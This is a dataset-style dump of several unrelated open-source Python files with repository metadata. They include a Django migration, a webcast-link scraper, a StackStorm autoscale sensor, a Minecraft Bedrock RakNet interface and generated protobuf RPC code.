| 34.965909 | 113 | 0.710757 | 411 | 3,077 | 5.206813 | 0.418491 | 0.056075 | 0.015421 | 0.014953 | 0.024299 | 0.024299 | 0 | 0 | 0 | 0 | 0 | 0.003296 | 0.211245 | 3,077 | 87 | 114 | 35.367816 | 0.878451 | 0.550861 | 0 | 0.153846 | 0 | 0 | 0.165741 | 0.042823 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0.307692 | 0 | 0.576923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
95f75eaca73ae30c8e035d0f42b380aa62357693 | 588 | py | Python | app/migrations/0002_alter_project_user.py | kibetrono/Django-Awwards | a6b61b1615b333392ec8b671e4c6e58e4619d664 | [
"Unlicense"
] | null | null | null | app/migrations/0002_alter_project_user.py | kibetrono/Django-Awwards | a6b61b1615b333392ec8b671e4c6e58e4619d664 | [
"Unlicense"
] | null | null | null | app/migrations/0002_alter_project_user.py | kibetrono/Django-Awwards | a6b61b1615b333392ec8b671e4c6e58e4619d664 | [
"Unlicense"
] | null | null | null | # Generated by Django 4.0.3 on 2022-03-13 05:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('app', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='project',
name='user',
field=models.ForeignKey(blank='True', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| 26.727273 | 135 | 0.668367 | 70 | 588 | 5.5 | 0.614286 | 0.062338 | 0.072727 | 0.114286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041394 | 0.219388 | 588 | 21 | 136 | 28 | 0.797386 | 0.076531 | 0 | 0 | 1 | 0 | 0.055453 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2501479a85ccb4c675426d7c0a861337fbeba505 | 349 | py | Python | mayan/apps/document_comments/search.py | wan1869/dushuhu | 934dd178e67140cffc6b9203e793fdf8bbc73a54 | [
"Apache-2.0"
] | 1 | 2021-02-24T15:03:23.000Z | 2021-02-24T15:03:23.000Z | mayan/apps/document_comments/search.py | wan1869/dushuhu | 934dd178e67140cffc6b9203e793fdf8bbc73a54 | [
"Apache-2.0"
] | null | null | null | mayan/apps/document_comments/search.py | wan1869/dushuhu | 934dd178e67140cffc6b9203e793fdf8bbc73a54 | [
"Apache-2.0"
] | 1 | 2020-08-09T09:06:59.000Z | 2020-08-09T09:06:59.000Z | from django.utils.translation import ugettext_lazy as _
from mayan.apps.documents.search import document_page_search, document_search
document_page_search.add_model_field(
field='document_version__document__comments__comment',
label=_('Comments')
)
document_search.add_model_field(
field='comments__comment',
label=_('Comments')
)
| 26.846154 | 77 | 0.808023 | 43 | 349 | 6.023256 | 0.488372 | 0.092664 | 0.138996 | 0.146718 | 0.185328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106017 | 349 | 12 | 78 | 29.083333 | 0.830128 | 0 | 0 | 0.2 | 0 | 0 | 0.223496 | 0.12894 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25054ec2199ade932c6b3968f0314203a2957f72 | 712 | py | Python | test/test_csv_functions.py | mz2449/embryo-analyzer | 4de725be6c8620d40ca36271bb4629e97abb58c8 | [
"MIT"
] | null | null | null | test/test_csv_functions.py | mz2449/embryo-analyzer | 4de725be6c8620d40ca36271bb4629e97abb58c8 | [
"MIT"
] | null | null | null | test/test_csv_functions.py | mz2449/embryo-analyzer | 4de725be6c8620d40ca36271bb4629e97abb58c8 | [
"MIT"
] | null | null | null | import unittest
import csv_functions
class TestCsvFunctions(unittest.TestCase):
def test_open_test_file(self):
expected = [['X', 'Y'], ['0', '0'], ['1', '10'], ['2', '15'], ['3', '50'], ['4', '80'], ['5', '100'],
['6', '80'], ['7', '45'], ['8', '35'], ['9', '15'], ['10', '5']]
actual = csv_functions.csv_open('test_1.csv')
self.assertEqual(expected, actual)
expected = [['X', 'Y'], ['0', '0'], ['1', '20'], ['2', '30'], ['3', '100'], ['4', '160'], ['5', '200'],
['6', '160'], ['7', '90'], ['8', '70'], ['9', '30'], ['10', '10']]
actual = csv_functions.csv_open('test_2.csv')
self.assertEqual(expected, actual)
| 44.5 | 114 | 0.446629 | 93 | 712 | 3.354839 | 0.451613 | 0.115385 | 0.070513 | 0.076923 | 0.49359 | 0.288462 | 0.102564 | 0.102564 | 0 | 0 | 0 | 0.131627 | 0.231742 | 712 | 15 | 115 | 47.466667 | 0.431444 | 0 | 0 | 0.166667 | 0 | 0 | 0.140449 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2507b63b0a2470c16a1151ca0e32b26498a9ea3f | 2,654 | py | Python | Webcast/2015 webcast/2015Webcast1.py | hueyjj/UCSCWebcast | 9c4c94b4dfd453385f8fd3b927cbdc043e2407b3 | [
"Unlicense"
] | null | null | null | Webcast/2015 webcast/2015Webcast1.py | hueyjj/UCSCWebcast | 9c4c94b4dfd453385f8fd3b927cbdc043e2407b3 | [
"Unlicense"
] | null | null | null | Webcast/2015 webcast/2015Webcast1.py | hueyjj/UCSCWebcast | 9c4c94b4dfd453385f8fd3b927cbdc043e2407b3 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
import sys, os, time, urllib, urllib.request, shutil, re, lxml, threading, queue, multiprocessing
import hashlib
from bs4 import BeautifulSoup
from urllib.parse import urlparse
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.expected_conditions import staleness_of
# 2015Webcast.py gets all the information for 2016 webcasts in the following format:
# name, youtubeUp, sha256, dir, vidlink
# and stores the information into a csv format in a text file
#TODO youtube-Upload: unlisted, no votes, comments disabled... anything else?
#url = "http://matterhorn2-player-1.lt.ucsc.edu:8080/engage/ui/index.html" #2015
# init()
def init():
# 2016 webcast gallery link
root_url = "http://matterhorn-player-1.lt.ucsc.edu:8080/engage/ui/index.html"
# load chrome webdriver
chrome = webdriver.Chrome()
chrome.get(root_url)
return chrome
# Open next page
def next_page(chrome, wait):
try:
# next button clickable
wait.until(EC.element_to_be_clickable((By.LINK_TEXT, 'Next')))
chrome.find_element_by_link_text("Next").click() # click next button
except Exception as e:
print("next_page error:", e, flush=True)
return 1
else:
return 0
def get_webcast_list(src):
webcastlist = []
html = BeautifulSoup(src, 'lxml')
for table in html.find_all('table'):
for a_tag in table.find_all('a'):
if a_tag.text != "":
# adds (title, link) to webcastlist
title = a_tag.text
link = real_link(a_tag.get('href'))
info = (title, link)
webcastlist.append(info)
return webcastlist
def real_link(suffix):
base_url = "http://matterhorn-player-1.lt.ucsc.edu:8080/engage/ui/"
return base_url + suffix
# main
def main(argv):
chrome = init()
# max time out = 60 seconds
wait = WebDriverWait(chrome, 60)
time.sleep(5)
file = open('links.txt', 'a')
while True:
info = get_webcast_list(chrome.page_source)
for title, link in info:
file.write(title + ', ' + link + '\n')
print('writing...\n' + title + ', ' + link + '\n', flush=True)
if next_page(chrome, wait) == 1:
break;
else:
time.sleep(3)
file.close()
chrome.close()
if __name__ == "__main__":
main(sys.argv[1:])
| 30.159091 | 98 | 0.628862 | 346 | 2,654 | 4.710983 | 0.421965 | 0.03681 | 0.051534 | 0.051534 | 0.083436 | 0.083436 | 0.083436 | 0.083436 | 0.083436 | 0.083436 | 0 | 0.023422 | 0.259985 | 2,654 | 87 | 99 | 30.505747 | 0.806517 | 0.199699 | 0 | 0.036364 | 0 | 0.018182 | 0.095992 | 0 | 0 | 0 | 0 | 0.011494 | 0 | 1 | 0.090909 | false | 0 | 0.163636 | 0 | 0.345455 | 0.036364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25103d94725878101286ec82e7086af94123d276 | 4,625 | py | Python | packs/autoscale/sensors/autoscale_governor_sensor.py | Mattlk13/incubator | 3b6c59116c16b3bafe3bf1119c9cf73774451e36 | [
"Apache-2.0"
] | 31 | 2015-01-25T08:04:02.000Z | 2018-08-30T19:13:40.000Z | packs/autoscale/sensors/autoscale_governor_sensor.py | StorminStanley/st2incubator | 278c3a23d516d76b01c6e47693b41816794cfad6 | [
"Apache-2.0"
] | 58 | 2015-01-10T05:21:08.000Z | 2017-06-14T17:36:04.000Z | packs/autoscale/sensors/autoscale_governor_sensor.py | StorminStanley/st2incubator | 278c3a23d516d76b01c6e47693b41816794cfad6 | [
"Apache-2.0"
] | 33 | 2015-02-03T17:18:28.000Z | 2018-06-16T20:16:04.000Z | import time
import eventlet
import ast
from st2reactor.sensor.base import PollingSensor
__all_ = [
'AutoscaleGovernorSensor'
]
eventlet.monkey_patch(
os=True,
select=True,
socket=True,
thread=True,
time=True)
GROUP_ACTIVE_STATUS = [
'expanding',
'deflating'
]
class AutoscaleGovernorSensor(PollingSensor):
def __init__(self, sensor_service, config=None, poll_interval=60):
super(AutoscaleGovernorSensor, self).__init__(sensor_service=sensor_service,
config=config,
poll_interval=poll_interval)
self._logger = self._sensor_service.get_logger(__name__)
self._kvp_get = self._sensor_service.get_value
self._trigger = {
'expand': 'autoscale.ScaleUpPulse',
'deflate': 'autoscale.ScaleDownPulse'
}
self._bound = {
'expand': 'max',
'deflate': 'min'
}
def setup(self):
pass
def poll(self):
alerting_asgs = []
stable_asgs = []
# Get all the ASG related keys in the Key Store
kvps = self._sensor_service.list_values(local=False, prefix='asg.')
# Sort out which Applications are actively alerting, and which are not.
for kvp in kvps:
if 'active_incident' in kvp.name:
asg_data = kvp.name.split('.')
asg = asg_data[1]
if ast.literal_eval(kvp.value):
alerting_asgs.append(asg)
else:
stable_asgs.append(asg)
# Attempt to determine if an ASG needs to scale up...
for asg in alerting_asgs:
self._process_asg(asg, 'expand')
# ... or down
for asg in stable_asgs:
self._process_asg(asg, 'deflate')
def cleanup(self):
pass
def add_trigger(self, trigger):
pass
def update_trigger(self, trigger):
pass
def remove_trigger(self, trigger):
pass
def _process_asg(self, asg, action):
trigger_type = self._trigger[action]
bound = self._bound[action]
group_status = self._kvp_get('asg.%s.status' % (asg), local=False)
last_event_timestamp = self._kvp_get('asg.%s.last_%s_timestamp' % (asg, action), local=False)
event_delay = self._kvp_get('asg.%s.%s_delay' % (asg, action), local=False)
current_node_count = self._kvp_get('asg.%s.total_nodes' % (asg), local=False)
node_bound = self._kvp_get('asg.%s.%s_nodes' % (asg, bound), local=False)
total_nodes = self._kvp_get('asg.%s.total_nodes' % (asg), local=False)
if group_status in GROUP_ACTIVE_STATUS:
self._logger.info("AutoScaleGovernor: Autoscale group is currently %s. Skipping..." %
(group_status))
return
# ensure we have all the required variables
if last_event_timestamp and event_delay and current_node_count and node_bound and total_nodes:
# See if an ASG is even eligible to be acted upon, min or max.
bound_check = getattr(self, '_%s_bound_check' % bound)(int(node_bound), int(total_nodes))
delay_check = self._event_delay_check(int(last_event_timestamp), int(event_delay))
if bound_check and delay_check:
self._dispatch_trigger(trigger_type, asg)
else:
self._logger.info("AutoScaleGovernor: Not all K/V pairs exist for ASG %s. Skipping..." % asg)
def _event_delay_check(self, last_event_timestamp, event_delay):
check = True if last_event_timestamp + (event_delay * 60) < int(time.time()) else False
return check
def _max_bound_check(self, max_nodes, total_nodes):
"""
Make sure we have not reached the threshold and are not above max_nodes.
We only want to send scale up pulse if we are not above max_nodes threshold.
"""
check = True if total_nodes < max_nodes else False
return check
def _min_bound_check(self, min_nodes, total_nodes):
"""
Make sure we have not reached the min_nodes threshold.
We only want to scale down if current number of nodes is greater than min_nodes.
"""
check = True if total_nodes > min_nodes else False
return check
def _dispatch_trigger(self, trigger, asg):
payload = {
'asg': asg,
}
self._sensor_service.dispatch(trigger=trigger, payload=payload)
| 34.774436 | 105 | 0.604324 | 563 | 4,625 | 4.701599 | 0.264654 | 0.034001 | 0.026445 | 0.029467 | 0.207027 | 0.09218 | 0.05969 | 0.05969 | 0.05969 | 0.05969 | 0 | 0.001869 | 0.30573 | 4,625 | 132 | 106 | 35.037879 | 0.822485 | 0.123459 | 0 | 0.108696 | 0 | 0 | 0.100853 | 0.023332 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0.054348 | 0.043478 | 0 | 0.228261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
2513a85a060f63689464484e118cc0d87d6037d8 | 746 | py | Python | generators/usage-generator.py | cmusv-sc/OpenNEX-Team5 | 5e269d85d28e3eb7c6936df3ed22c3aa2f9250f8 | [
"Apache-2.0"
] | null | null | null | generators/usage-generator.py | cmusv-sc/OpenNEX-Team5 | 5e269d85d28e3eb7c6936df3ed22c3aa2f9250f8 | [
"Apache-2.0"
] | null | null | null | generators/usage-generator.py | cmusv-sc/OpenNEX-Team5 | 5e269d85d28e3eb7c6936df3ed22c3aa2f9250f8 | [
"Apache-2.0"
] | null | null | null | import uuid
import datetime
import random
import sys
args = sys.argv[1:]
if(len(args) < 2):
print "usage: python usage-generator.py [idCount] [numOfLines] (outdir)"
sys.exit(1)
OUTDIR=""
if len(args) > 2:
OUTDIR=args[2]
# generate X unique IDs
X=int(args[0])
ids=[]
for i in range(0, X):
aId = uuid.uuid4()
ids.append(str(aId))
# seed random generator
random.seed()
# generate Y lines of text
curTime = datetime.datetime.now().isoformat().replace(":", ".")
filename = OUTDIR + "usage-log-" + curTime + ".log"
logFile = open(filename, 'w')
ENTRIES=int(args[1])
for i in range(0,ENTRIES):
idIndex = random.randint(0,X-1)
uid = ids[idIndex]
logFile.write(uid + "\t" + datetime.datetime.now().isoformat() + "\n")
print "log generated" | 20.162162 | 73 | 0.672922 | 115 | 746 | 4.365217 | 0.486957 | 0.02988 | 0.035857 | 0.039841 | 0.047809 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018809 | 0.144772 | 746 | 37 | 74 | 20.162162 | 0.768025 | 0.091153 | 0 | 0 | 0 | 0 | 0.145185 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
251e027840648bd7ad225b2cb161fd768e750f36 | 5,473 | py | Python | podrum/interface/rak_net_interface.py | NotKonishi/Podrum | df6ea1a596bf3a44e7e4f580f12a352bd37f4aaf | [
"MIT"
] | null | null | null | podrum/interface/rak_net_interface.py | NotKonishi/Podrum | df6ea1a596bf3a44e7e4f580f12a352bd37f4aaf | [
"MIT"
] | null | null | null | podrum/interface/rak_net_interface.py | NotKonishi/Podrum | df6ea1a596bf3a44e7e4f580f12a352bd37f4aaf | [
"MIT"
] | null | null | null | ################################################################################
# #
# ____ _ #
# | _ \ ___ __| |_ __ _ _ _ __ ___ #
# | |_) / _ \ / _` | '__| | | | '_ ` _ \ #
# | __/ (_) | (_| | | | |_| | | | | | | #
# |_| \___/ \__,_|_| \__,_|_| |_| |_| #
# #
# Copyright 2021 Podrum Studios #
# #
# Permission is hereby granted, free of charge, to any person #
# obtaining a copy of this software and associated documentation #
# files (the "Software"), to deal in the Software without restriction, #
# including without limitation the rights to use, copy, modify, merge, #
# publish, distribute, sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is furnished to do so, #
# subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included #
# in all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS #
# IN THE SOFTWARE. #
# #
################################################################################
from constant.version import version
from packet.mcbe.game_packet import game_packet
from player.bedrock_player import bedrock_player
from rak_net.server import server as rak_net_server
from threading import Thread
class rak_net_interface(Thread):
def __init__(self, server: object) -> None:
super().__init__()
self.server: object = server
self.rak_net_server: object = rak_net_server(server.config.data["ip_address"]["hostname"], server.config.data["ip_address"]["port"])
self.rak_net_server.interface: object = self
self.set_status(server.config.data["motd"], 0, server.config.data["max_players"])
def get_count(self) -> int:
name: str = self.rak_net_server.name.split(";")
return int(name[4])
def get_max_count(self) -> int:
name: str = self.rak_net_server.name.split(";")
return int(name[5])
def get_motd(self) -> str:
name: str = self.rak_net_server.name.split(";")
return name[1]
def set_status(self, motd: str, count: int, max_count: int) -> None:
self.rak_net_server.name: str = f"MCPE;{motd};{version.mcbe_protocol_version};{version.mcbe_version};{count};{max_count};0;"
def set_motd(self, motd: str) -> None:
self.set_status(motd, self.get_count(), self.get_max_count())
def set_count(self, count: int) -> None:
self.set_status(self.get_motd(), count, self.get_max_count())
def set_max_count(self, max_count: int) -> None:
self.set_status(self.get_motd(), self.get_count(), max_count)
def on_frame(self, packet: object, connection: object) -> None:
if connection.address.token in self.server.players:
if packet.body[0] == 0xfe:
new_packet: object = game_packet(packet.body)
new_packet.decode()
packets: list = new_packet.read_packets_data()
for batch in packets:
print(f'[Packet]: {hex(batch[0])}')
self.server.players[connection.address.token].handle_packet(batch)
def on_new_incoming_connection(self, connection: object) -> None:
self.server.players[connection.address.token]: object = bedrock_player(connection, self.server)
self.server.players[connection.address.token].entity_id: int = self.server.current_entity_id
self.server.current_entity_id += 1
self.set_count(len(self.server.players))
self.server.logger.info(f"{connection.address.token} connected.")
def on_disconnect(self, connection: object) -> None:
del self.server.players[connection.address.token]
self.set_count(len(self.server.players))
self.server.logger.info(f"{connection.address.token} disconnected.")
def start_interface(self) -> None:
self.stopped: bool = False
self.start()
def stop_interface(self) -> None:
self.stopped: bool = True
def run(self):
while not self.stopped:
self.rak_net_server.handle()
| 53.656863 | 140 | 0.529874 | 574 | 5,473 | 4.818815 | 0.303136 | 0.050615 | 0.043384 | 0.040492 | 0.283442 | 0.23355 | 0.154013 | 0.135213 | 0.135213 | 0.095445 | 0 | 0.003624 | 0.344601 | 5,473 | 101 | 141 | 54.188119 | 0.767494 | 0.359035 | 0 | 0.089286 | 0 | 0 | 0.078425 | 0.045884 | 0 | 0 | 0.001302 | 0 | 0 | 1 | 0.25 | false | 0 | 0.089286 | 0 | 0.410714 | 0.017857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
251e8a2852936ddefe54d8eec8adb2bfef6d68d2 | 6,867 | py | Python | snakebite/protobuf/RpcPayloadHeader_pb2.py | cglewis/snakebite | 98bb423d5fed9803e94782e93a3a7b8ca8d46fc8 | [
"Apache-2.0"
] | 1 | 2020-09-06T09:30:01.000Z | 2020-09-06T09:30:01.000Z | snakebite/protobuf/RpcPayloadHeader_pb2.py | cglewis/snakebite | 98bb423d5fed9803e94782e93a3a7b8ca8d46fc8 | [
"Apache-2.0"
] | null | null | null | snakebite/protobuf/RpcPayloadHeader_pb2.py | cglewis/snakebite | 98bb423d5fed9803e94782e93a3a7b8ca8d46fc8 | [
"Apache-2.0"
] | null | null | null | # Generated by the protocol buffer compiler. DO NOT EDIT!
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
DESCRIPTOR = descriptor.FileDescriptor(
name='RpcPayloadHeader.proto',
package='',
serialized_pb='\n\x16RpcPayloadHeader.proto\"q\n\x15RpcPayloadHeaderProto\x12\x1e\n\x07rpcKind\x18\x01 \x01(\x0e\x32\r.RpcKindProto\x12(\n\x05rpcOp\x18\x02 \x01(\x0e\x32\x19.RpcPayloadOperationProto\x12\x0e\n\x06\x63\x61llId\x18\x03 \x02(\r\"f\n\x16RpcResponseHeaderProto\x12\x0e\n\x06\x63\x61llId\x18\x01 \x02(\r\x12\x1f\n\x06status\x18\x02 \x02(\x0e\x32\x0f.RpcStatusProto\x12\x1b\n\x13serverIpcVersionNum\x18\x03 \x01(\r*J\n\x0cRpcKindProto\x12\x0f\n\x0bRPC_BUILTIN\x10\x00\x12\x10\n\x0cRPC_WRITABLE\x10\x01\x12\x17\n\x13RPC_PROTOCOL_BUFFER\x10\x02*i\n\x18RpcPayloadOperationProto\x12\x15\n\x11RPC_FINAL_PAYLOAD\x10\x00\x12\x1c\n\x18RPC_CONTINUATION_PAYLOAD\x10\x01\x12\x18\n\x14RPC_CLOSE_CONNECTION\x10\x02*3\n\x0eRpcStatusProto\x12\x0b\n\x07SUCCESS\x10\x00\x12\t\n\x05\x45RROR\x10\x01\x12\t\n\x05\x46\x41TAL\x10\x02\x42;\n\x1eorg.apache.hadoop.ipc.protobufB\x16RpcPayloadHeaderProtos\xa0\x01\x01')
_RPCKINDPROTO = descriptor.EnumDescriptor(
name='RpcKindProto',
full_name='RpcKindProto',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(
name='RPC_BUILTIN', index=0, number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_WRITABLE', index=1, number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_PROTOCOL_BUFFER', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=245,
serialized_end=319,
)
_RPCPAYLOADOPERATIONPROTO = descriptor.EnumDescriptor(
name='RpcPayloadOperationProto',
full_name='RpcPayloadOperationProto',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(
name='RPC_FINAL_PAYLOAD', index=0, number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_CONTINUATION_PAYLOAD', index=1, number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='RPC_CLOSE_CONNECTION', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=321,
serialized_end=426,
)
_RPCSTATUSPROTO = descriptor.EnumDescriptor(
name='RpcStatusProto',
full_name='RpcStatusProto',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(
name='SUCCESS', index=0, number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='ERROR', index=1, number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(
name='FATAL', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=428,
serialized_end=479,
)
RPC_BUILTIN = 0
RPC_WRITABLE = 1
RPC_PROTOCOL_BUFFER = 2
RPC_FINAL_PAYLOAD = 0
RPC_CONTINUATION_PAYLOAD = 1
RPC_CLOSE_CONNECTION = 2
SUCCESS = 0
ERROR = 1
FATAL = 2
_RPCPAYLOADHEADERPROTO = descriptor.Descriptor(
name='RpcPayloadHeaderProto',
full_name='RpcPayloadHeaderProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='rpcKind', full_name='RpcPayloadHeaderProto.rpcKind', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='rpcOp', full_name='RpcPayloadHeaderProto.rpcOp', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='callId', full_name='RpcPayloadHeaderProto.callId', index=2,
number=3, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=26,
serialized_end=139,
)
_RPCRESPONSEHEADERPROTO = descriptor.Descriptor(
name='RpcResponseHeaderProto',
full_name='RpcResponseHeaderProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='callId', full_name='RpcResponseHeaderProto.callId', index=0,
number=1, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='status', full_name='RpcResponseHeaderProto.status', index=1,
number=2, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='serverIpcVersionNum', full_name='RpcResponseHeaderProto.serverIpcVersionNum', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=141,
serialized_end=243,
)
_RPCPAYLOADHEADERPROTO.fields_by_name['rpcKind'].enum_type = _RPCKINDPROTO
_RPCPAYLOADHEADERPROTO.fields_by_name['rpcOp'].enum_type = _RPCPAYLOADOPERATIONPROTO
_RPCRESPONSEHEADERPROTO.fields_by_name['status'].enum_type = _RPCSTATUSPROTO
DESCRIPTOR.message_types_by_name['RpcPayloadHeaderProto'] = _RPCPAYLOADHEADERPROTO
DESCRIPTOR.message_types_by_name['RpcResponseHeaderProto'] = _RPCRESPONSEHEADERPROTO
class RpcPayloadHeaderProto(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _RPCPAYLOADHEADERPROTO
# @@protoc_insertion_point(class_scope:RpcPayloadHeaderProto)
class RpcResponseHeaderProto(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _RPCRESPONSEHEADERPROTO
# @@protoc_insertion_point(class_scope:RpcResponseHeaderProto)
# @@protoc_insertion_point(module_scope)
| 33.014423 | 904 | 0.745886 | 816 | 6,867 | 6.069853 | 0.193627 | 0.051686 | 0.039976 | 0.034525 | 0.528367 | 0.485968 | 0.451645 | 0.442358 | 0.429235 | 0.401777 | 0 | 0.049341 | 0.138197 | 6,867 | 207 | 905 | 33.173913 | 0.787597 | 0.036406 | 0 | 0.572222 | 1 | 0.005556 | 0.227953 | 0.194524 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022222 | 0 | 0.055556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
252bfe0a0bcfd5b730fdf638e6a25a62796892a0 | 5,441 | py | Python | admin/manage.py | agglrx/Mailu | a880bc908ecdfedcd1eb0d5f3782c74f4f0f4506 | [
"MIT"
] | null | null | null | admin/manage.py | agglrx/Mailu | a880bc908ecdfedcd1eb0d5f3782c74f4f0f4506 | [
"MIT"
] | null | null | null | admin/manage.py | agglrx/Mailu | a880bc908ecdfedcd1eb0d5f3782c74f4f0f4506 | [
"MIT"
] | null | null | null | from mailu import app, manager, db
from mailu.admin import models
@manager.command
